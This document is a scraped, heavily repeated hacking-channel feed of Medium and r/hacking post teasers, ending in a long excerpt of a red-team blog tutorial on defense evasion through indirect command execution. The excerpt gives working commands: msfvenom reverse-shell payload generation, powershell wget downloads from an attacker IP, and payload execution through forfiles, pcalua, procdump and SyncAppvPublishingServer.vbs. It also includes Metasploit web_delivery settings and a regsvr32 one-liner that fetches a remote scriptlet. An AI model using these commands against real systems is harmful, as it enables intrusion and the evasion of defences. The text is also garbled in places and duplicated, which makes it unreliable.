Hacking on Medium
Who Am I ?
Hi guys, I'm your friendly neighborhood Jayachandran 😉. I want to share my knowledge on this platform. Ok, wait, who am I ? I'm a Blogger…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Who Am I ?
Hi guys, I'm your friendly neighborhood Jayachandran 😉. I want to share my knowledge on this platform. Ok, wait, who am I ? I'm a Blogger…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Who Am I ?
Hi guys, I'm your friendly neighborhood Jayachandran 😉. I want to share my knowledge on this platform. Ok, wait, who am I ? I'm a Blogger…
Hacking on Medium
Online Book Store v1.0 exploit
https://cdn-images-1.medium.com/max/1199/1*eerGIgV5Ognd70x3nunkMg.png
Se ejecuta un simple RCE para realizar nuestras practicas de explotación
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Online Book Store v1.0 exploit
https://cdn-images-1.medium.com/max/1199/1*eerGIgV5Ognd70x3nunkMg.png
Se ejecuta un simple RCE para realizar nuestras practicas de explotación
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Online Book Store v1.0 exploit
Se ejecuta un simple RCE para realizar nuestras practicas de explotación
Hacking on Medium
How to Become an Ethical Hacker in 2022?
https://cdn-images-1.medium.com/max/600/0*1NzIN4UsVNxxbfjn
What is Ethical Hacking?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to Become an Ethical Hacker in 2022?
https://cdn-images-1.medium.com/max/600/0*1NzIN4UsVNxxbfjn
What is Ethical Hacking?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Become an Ethical Hacker in 2022?
What is Ethical Hacking?
Hacking on Medium
La botnet DirtyMoe obtiene nuevos exploits en el módulo Wormable para propagarse rápidamente
https://cdn-images-1.medium.com/max/1536/0*byWvJNd5EQZjT44R
PUBLICADO EN 17 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
La botnet DirtyMoe obtiene nuevos exploits en el módulo Wormable para propagarse rápidamente
https://cdn-images-1.medium.com/max/1536/0*byWvJNd5EQZjT44R
PUBLICADO EN 17 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
La botnet DirtyMoe obtiene nuevos exploits en el módulo Wormable para propagarse rápidamente
PUBLICADO EN 17 MARZO, 2022POR EHACKING
Hacking on Medium
How to Copy an Apartment Fob (HID ProxCard) with a Proxmark3 RDV4
https://cdn-images-1.medium.com/max/2297/1*Gc_L4h1vIAqM34Jnj4YdNw.png
If you’ve lived in an apartment complex you’re probably familiar with key fobs or cards used for access control systems, unfortunately…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to Copy an Apartment Fob (HID ProxCard) with a Proxmark3 RDV4
https://cdn-images-1.medium.com/max/2297/1*Gc_L4h1vIAqM34Jnj4YdNw.png
If you’ve lived in an apartment complex you’re probably familiar with key fobs or cards used for access control systems, unfortunately…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Copy an Apartment Fob (HID ProxCard) with a Proxmark3 RDV4
If you’ve lived in an apartment complex you’re probably familiar with key fobs or cards used for access control systems, unfortunately…
hacking: security in practice
Exploit completed, but no session was created. - proftp_telnet_iac
Hello, i just setup a kali VM and ran metasploit on it, when trying to use the proftp_telnet_iac exploit it throws back (Censored RHOST):
Started reverse TCP handler on 0.0.0.0:4444
[*] - Automatically detecting the target...
[*] - FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:10.126.75.4]
[*] - Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
[*] Exploit completed, but no session was created.
What should i do to make it work?, pretty sure it's something related to the LPORT or LHOST, I put my IP on LHOST, and left LPORT on default without setting up anything, can someone give me a helping hand?
submitted by /u/HackerArgento
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Exploit completed, but no session was created. - proftp_telnet_iac
Hello, i just setup a kali VM and ran metasploit on it, when trying to use the proftp_telnet_iac exploit it throws back (Censored RHOST):
Started reverse TCP handler on 0.0.0.0:4444
[*] - Automatically detecting the target...
[*] - FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:10.126.75.4]
[*] - Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
[*] Exploit completed, but no session was created.
What should i do to make it work?, pretty sure it's something related to the LPORT or LHOST, I put my IP on LHOST, and left LPORT on default without setting up anything, can someone give me a helping hand?
submitted by /u/HackerArgento
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Exploit completed, but no session was created. - proftp_telnet_iac
Hello, i just setup a kali VM and ran metasploit on it, when trying to use the proftp\_telnet\_iac exploit it throws back (Censored...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to create a personal gpedit to change Group Policy for powershell execution policy bypass.
https://external-preview.redd.it/PYGzYQtMpbr3_8g6UMaY9hFhufw5RhrT5GTDRp1pOyY.jpg?width=108&crop=smart&auto=webp&s=6e8713c3fca180c7b1e56df0d002b644791a81ab submitted by /u/chaseNscores
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to create a personal gpedit to change Group Policy for powershell execution policy bypass.
https://external-preview.redd.it/PYGzYQtMpbr3_8g6UMaY9hFhufw5RhrT5GTDRp1pOyY.jpg?width=108&crop=smart&auto=webp&s=6e8713c3fca180c7b1e56df0d002b644791a81ab submitted by /u/chaseNscores
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to create a personal gpedit to change Group Policy for...
Posted in r/hacking by u/chaseNscores • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Browser In The Browser phishing attack vector
https://mrd0x.com/browser-in-the-browser-phishing-attack/
submitted by /u/inf0s33k3r
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Browser In The Browser phishing attack vector
https://mrd0x.com/browser-in-the-browser-phishing-attack/
submitted by /u/inf0s33k3r
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Browser In The Browser phishing attack vector
[https://mrd0x.com/browser-in-the-browser-phishing-attack/](https://mrd0x.com/browser-in-the-browser-phishing-attack/)
hacking: security in practice
Issues with pyinstaller/auto-py-to-exe
Issues converting py to exe using auto-py-to-exe
Anyone here know how to fix this? I see that it says “Failed to process hook entry point” maybe thats the issue? Idk.
Heres the error:
54517 ERROR: An error occurred while packaging Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/autopy_to_exe/packaging.py", line 131, in package run_pyinstaller() File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 124, in run run_build(pyi_config, spec_file, **vars(args)) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 58, in run_build PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 803, in main build(specfile, distpath, workpath, clean_build) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 725, in build exec(code, spec_namespace) File "/tmp/tmpyzydmpvu/hello.spec", line 7, in /u/NightComprehensive52
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Issues with pyinstaller/auto-py-to-exe
Issues converting py to exe using auto-py-to-exe
Anyone here know how to fix this? I see that it says “Failed to process hook entry point” maybe thats the issue? Idk.
Heres the error:
54517 ERROR: An error occurred while packaging Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/autopy_to_exe/packaging.py", line 131, in package run_pyinstaller() File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 124, in run run_build(pyi_config, spec_file, **vars(args)) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 58, in run_build PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 803, in main build(specfile, distpath, workpath, clean_build) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 725, in build exec(code, spec_namespace) File "/tmp/tmpyzydmpvu/hello.spec", line 7, in /u/NightComprehensive52
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Issues with pyinstaller/auto-py-to-exe
Issues converting py to exe using auto-py-to-exe Anyone here know how to fix this? I see that it says “Failed to process hook entry point” maybe...
hacking: security in practice
asking for a friend
Not sure if i’m in the right place for this, but can anybody here verify instagram/twitter accs?
submitted by /u/b3nf
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
asking for a friend
Not sure if i’m in the right place for this, but can anybody here verify instagram/twitter accs?
submitted by /u/b3nf
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
asking for a friend
Not sure if i’m in the right place for this, but can anybody here verify instagram/twitter accs?
hacking: security in practice
Anonymous fox
Hey there. Does anyone have any experience with anonymous fox? For those of you unfamiliar it is a set of tools designed for web hosting take over. I know for certain that it works, however I didn’t install it because of all the shady practices and details that orbit its installation.
What I want to know is if anyone can vouch for it, and or have had experience / success using it and what your take is on it? Thank you
submitted by /u/605yeeter
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Anonymous fox
Hey there. Does anyone have any experience with anonymous fox? For those of you unfamiliar it is a set of tools designed for web hosting take over. I know for certain that it works, however I didn’t install it because of all the shady practices and details that orbit its installation.
What I want to know is if anyone can vouch for it, and or have had experience / success using it and what your take is on it? Thank you
submitted by /u/605yeeter
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Anonymous fox
Hey there. Does anyone have any experience with anonymous fox? For those of you unfamiliar it is a set of tools designed for web hosting take...
hacking: security in practice
Hackers of Reddit, what's one piece of advice you would give to make our internet lives more secure?
Advice could be anything Hardware or Software. From passwords to general security flaws one should avoid. Common scams, fishing attempts, common mistakes, and so on. Also, you can include any external websites you could think of to further assist your answer.
submitted by /u/Steelesticles
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hackers of Reddit, what's one piece of advice you would give to make our internet lives more secure?
Advice could be anything Hardware or Software. From passwords to general security flaws one should avoid. Common scams, fishing attempts, common mistakes, and so on. Also, you can include any external websites you could think of to further assist your answer.
submitted by /u/Steelesticles
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hackers of Reddit, what's one piece of advice you would give to...
Advice could be anything Hardware or Software. From passwords to general security flaws one should avoid. Common scams, fishing attempts, common...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
https://external-preview.redd.it/v4UQyAxRkwjMc64VVre_jCiBppWx72ve7QwuG5p_n7Q.jpg?width=640&crop=smart&auto=webp&s=91d4002555d1158f316958149321e2736ff5518f submitted by /u/alt-glitch
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
https://external-preview.redd.it/v4UQyAxRkwjMc64VVre_jCiBppWx72ve7QwuG5p_n7Q.jpg?width=640&crop=smart&auto=webp&s=91d4002555d1158f316958149321e2736ff5518f submitted by /u/alt-glitch
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Unraveling Assets from Android Apps at Scale - An OSINT API allows...
Posted in r/hacking by u/alt-glitch • 1 point and 0 comments
hacking: security in practice
Do you think I will get compensated well over $8,000 for this vulnerability?
So I found a way to double your money and spend it with out actually deducting money from your account on the cashapp app for both android and ios.
I wont go into details but this would be my first vulnerability that I found that I think is a "severe" one since you can make money out of thin air.
idk how it works on the back end but I know it works. I also don't know if this is something I should report since idk if it has already been reported?
submitted by /u/yahboyelias
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Do you think I will get compensated well over $8,000 for this vulnerability?
So I found a way to double your money and spend it with out actually deducting money from your account on the cashapp app for both android and ios.
I wont go into details but this would be my first vulnerability that I found that I think is a "severe" one since you can make money out of thin air.
idk how it works on the back end but I know it works. I also don't know if this is something I should report since idk if it has already been reported?
submitted by /u/yahboyelias
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Do you think I will get compensated well over $8,000 for this...
So I found a way to double your money and spend it with out actually deducting money from your account on the cashapp app for both android and...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Indirect Command Execution: Defense Evasion (T1202)
IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may restrict certain types of scripts/executables from running. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, if a firewall is restricting DLL execution, it can be bypassed using a procdump method or if there is a whitelist on certain executables containing pcalua.exe, it can be used to execute other executables. Some of these methods are discussed in this article.Table of content· Malicious EXE creation· Method 1 - forfiles.exe· Method 2 - pcalua.exe· Method 3 - procdump.exe (DLL method)· Method 4 - SyncAppvPublishingServer.vbs· Method 5 - wlrmdr.exe· Method 6 - explorer.exe· Method 7 - cmd.exe· Method 8 - ftp.exe· Method 9 - conhost.exe· Method 10 - WSL Only (bash.exe)· Method 11 - WSL Only (wsl.exe)· ConclusionFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe into the victim machine using a python server.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe > shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj-wuREGwPxvcNPuPqJBQSjxC7mqPPUdZ2SZZfje33Cs8Z2wDXP1SNQbkWiXJny5VCM9GHzg5H1tSqY4X01wzn4B_siFHCn_Uc16ZI92hh4uAv5GGAX4PC1A45Ezc_U9iBT-i2NCN4YEKIQAdMnVyT2DsB7qZhVTEo0GaoZHPnSc34Vecgj3THrREEytA=s16000 Now, we can upload this executable to the already compromised victim device using powershell wgetpowershell wget 192.168.0.89/shell.exe -O C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj0qdPyyS3MywzDFfFtiSNsAdEK1KRIvU_itwrr7rBaJxq9Tc8HptN8XNGZnjfyn7SHcNf4L_MfRBbBgpVu-S7JJA9SwSAbzAItBFlBCI6ebzpywsJnZoJ5_WkJGxLO_MtTiVlnf6-NW6vFo-aHIK44lHqSkG4kYg-8ATKH_f2WTZ34OM5itsWNEww3lA=s16000 Now, the file is uploaded in the C:\Users\Publicdirectory for further use.Method 1 - forfilesAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag (here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our custom-made shell.forfiles /p c:\windows\system32 /m calc.exe /c C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEiAQkSEph-Yc7qfWnPbuDvEXL2O5EWeynYdO3ByEBrDh2VzVAkpKiqsLALM3IdLE3cbZjYIacm8r5KivBkLkzFwX2PovXI1ssUoErvec6RhVjcBvNsmeiL2tOKn_8Knf6us7DQwkSfTKxynKkVqnkAKuDbN1noEKPPRKTehBSmFS0A3X8df9Oih3irzag=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you c[...]
___________________________
@hacking_Attack
@Hacking_Video
Indirect Command Execution: Defense Evasion (T1202)
IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may restrict certain types of scripts/executables from running. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, if a firewall is restricting DLL execution, it can be bypassed using a procdump method or if there is a whitelist on certain executables containing pcalua.exe, it can be used to execute other executables. Some of these methods are discussed in this article.Table of content· Malicious EXE creation· Method 1 - forfiles.exe· Method 2 - pcalua.exe· Method 3 - procdump.exe (DLL method)· Method 4 - SyncAppvPublishingServer.vbs· Method 5 - wlrmdr.exe· Method 6 - explorer.exe· Method 7 - cmd.exe· Method 8 - ftp.exe· Method 9 - conhost.exe· Method 10 - WSL Only (bash.exe)· Method 11 - WSL Only (wsl.exe)· ConclusionFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe into the victim machine using a python server.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe > shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj-wuREGwPxvcNPuPqJBQSjxC7mqPPUdZ2SZZfje33Cs8Z2wDXP1SNQbkWiXJny5VCM9GHzg5H1tSqY4X01wzn4B_siFHCn_Uc16ZI92hh4uAv5GGAX4PC1A45Ezc_U9iBT-i2NCN4YEKIQAdMnVyT2DsB7qZhVTEo0GaoZHPnSc34Vecgj3THrREEytA=s16000 Now, we can upload this executable to the already compromised victim device using powershell wgetpowershell wget 192.168.0.89/shell.exe -O C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj0qdPyyS3MywzDFfFtiSNsAdEK1KRIvU_itwrr7rBaJxq9Tc8HptN8XNGZnjfyn7SHcNf4L_MfRBbBgpVu-S7JJA9SwSAbzAItBFlBCI6ebzpywsJnZoJ5_WkJGxLO_MtTiVlnf6-NW6vFo-aHIK44lHqSkG4kYg-8ATKH_f2WTZ34OM5itsWNEww3lA=s16000 Now, the file is uploaded in the C:\Users\Publicdirectory for further use.Method 1 - forfilesAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag (here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our custom-made shell.forfiles /p c:\windows\system32 /m calc.exe /c C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEiAQkSEph-Yc7qfWnPbuDvEXL2O5EWeynYdO3ByEBrDh2VzVAkpKiqsLALM3IdLE3cbZjYIacm8r5KivBkLkzFwX2PovXI1ssUoErvec6RhVjcBvNsmeiL2tOKn_8Knf6us7DQwkSfTKxynKkVqnkAKuDbN1noEKPPRKTehBSmFS0A3X8df9Oih3irzag=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you c[...]
___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Indirect Command Execution: Defense Evasion (T1202)
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Indirect Command Execution: Defense Evasion (T1202) IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put…
an see, forfiles.exe is running a suspicious file “shell.exe”Method 2 - pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this executable, this is more often whitelisted in the systems. This can also run custom exe in compatibility mode. We can run our executable using the program with “-a” flag like:pcalua.exe -a C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEi2uq-rNPAJI1FAjDYWp8n-ymHR3EtUbDZmYK07bnDsdVIcsoaoFwcs9Ju2fXIrsuG6uMQ7MrM8YoIRGdUUa8Tt-B-6JpiooWW1eE_eEgu6nsrU4N3VWaAUKMUcJSwhNziYoSfZ4xeS4Q7tlO25kUEcfG4VoEYjASE450YnMM3Tu8P94edsT8Lu5jNjIg=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe has spawned as a standalone process.Method 3 - procdump.exe (DLL method)ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. This binary, developed by sysinternals team, can also be used to execute a DLL file by utilizing the 'MiniDumpCallbackRoutine' exported function. A valid ongoing process has to be provided as the memory dump of that process will be created while loading this DLL onto it.msfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 > shell.dllhttps://blogger.googleusercontent.com/img/a/AVvXsEhYLRSUHzHTxEMpK2LIzGRWmD6UbwDEtDr_-FOxwBofbNV4C9ADkGqxO96zlw-a5wFg3qchVFqu1B2dhoEP02Mzhz4n-yZe1jgfQhQZkMAmy0dOHHNHwM6RQ7A6HaonIXuq7NNEOM47KGGqKA5dZiyO9XQyQdAUInuM5gXdZvfYdUzqSrjprivb4Dy2oA=s16000 Once, the DLL has been uploaded onto the victim system, using python server and powershell wget utility, procdump can be run with the “-md” optionC:\Sysinternals\procdump.exe -md shell.dll explorer.exehttps://blogger.googleusercontent.com/img/a/AVvXsEixa5wAW8UKBgZ2gamovgJFlUMAD9YAW1K6YRX0oKhB69vd9n_qo9hqJ6MvZ9z6yoYoxtFI8S8WjnhnZwgx2J97B6HgpbXioBs72hqUX4K0pX3lAMOKhhgbG_QRnXtmMkhnN4wR4pRv1ImstkPWD3W3b3urkf2Ez9wB094VQWjIZgbJGXnItKyfJ6UYCA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, our DLL has been executed using rundll as a child process of procdump.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
an see, forfiles.exe is running a suspicious file “shell.exe”Method 2 - pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this…
L_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 - SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions on Windows 10 and 11 only. This is developed by Microsoft and can be used for MS Application Virtualization. It can also be indirectly used for executing EXE. This is achieved by .NET cmdlet known as “Start-Process”SyncAppvPublishingServer.vbs "n; Start-Process C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEi51JoJQetwyc_mQt5oHfHeaLdXODKEBhwAzqEuPnL5RLdURtBBspCS68pMrxpf5MjPOGhfkptKIy6cz8ihry6a9hnMROJK5SEGvIz6Bmpkv4csZmpG8j_o2KYX-yAgbukHtBFV_xbuKaSLUIGphmba-zgbyNBjrDeocGNK8PmBplQv5wfIhgV3FPFW-A=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.use multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.89
set lport 1337
set target 3
runhttps://blogger.googleusercontent.com/img/a/AVvXsEi1xPz1hS2IxgvCBLTQ3ygUnFXIrcP0KhK2TuMuniUkcE0FZI3CfAj6tsQUKZ1uaTaQd4vHW_2bShfwrw_vLnbM0DIGOlhqHnJPWu8upLlts-f1AWYxBFjxar-ubp_ezlGCmKesJhAQbdh2f6M99MVqx66G9BCpCzt3O9qttCfaalQaRC4MV37ciQLBiQ=s16000 Now, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one liner.SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll"https://blogger.googleusercontent.com/img/a/AVvXsEgqG1KsczzhWRW8x3HazANBsmyI_VHOk0J-uxm7YXNQu8lOwqe3LOZgIBC1WN7g5kmOABqU4aDbG74oP_xh9_J8GjrnZ1jdpIJ7m-a90JK2g69GSg5ZW1Gk1nQce_qaI1gGy6gDDJv0Kb_wVdGdDn1bPj3FkyAFsinLlhY3jIsTVIAz0evzjdSWhIbjXA=s16000 On our Metasploit console, we receive a reverse shell!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.Method 5 - wlrmdr.exeWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login credentials. Here, this tool is taking bunch of flags for input.___________________________
@hacking_Attack
@Hacking_Video
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.89
set lport 1337
set target 3
runhttps://blogger.googleusercontent.com/img/a/AVvXsEi1xPz1hS2IxgvCBLTQ3ygUnFXIrcP0KhK2TuMuniUkcE0FZI3CfAj6tsQUKZ1uaTaQd4vHW_2bShfwrw_vLnbM0DIGOlhqHnJPWu8upLlts-f1AWYxBFjxar-ubp_ezlGCmKesJhAQbdh2f6M99MVqx66G9BCpCzt3O9qttCfaalQaRC4MV37ciQLBiQ=s16000 Now, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one liner.SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll"https://blogger.googleusercontent.com/img/a/AVvXsEgqG1KsczzhWRW8x3HazANBsmyI_VHOk0J-uxm7YXNQu8lOwqe3LOZgIBC1WN7g5kmOABqU4aDbG74oP_xh9_J8GjrnZ1jdpIJ7m-a90JK2g69GSg5ZW1Gk1nQce_qaI1gGy6gDDJv0Kb_wVdGdDn1bPj3FkyAFsinLlhY3jIsTVIAz0evzjdSWhIbjXA=s16000 On our Metasploit console, we receive a reverse shell!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.Method 5 - wlrmdr.exeWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login credentials. Here, this tool is taking bunch of flags for input.___________________________
@hacking_Attack
@Hacking_Video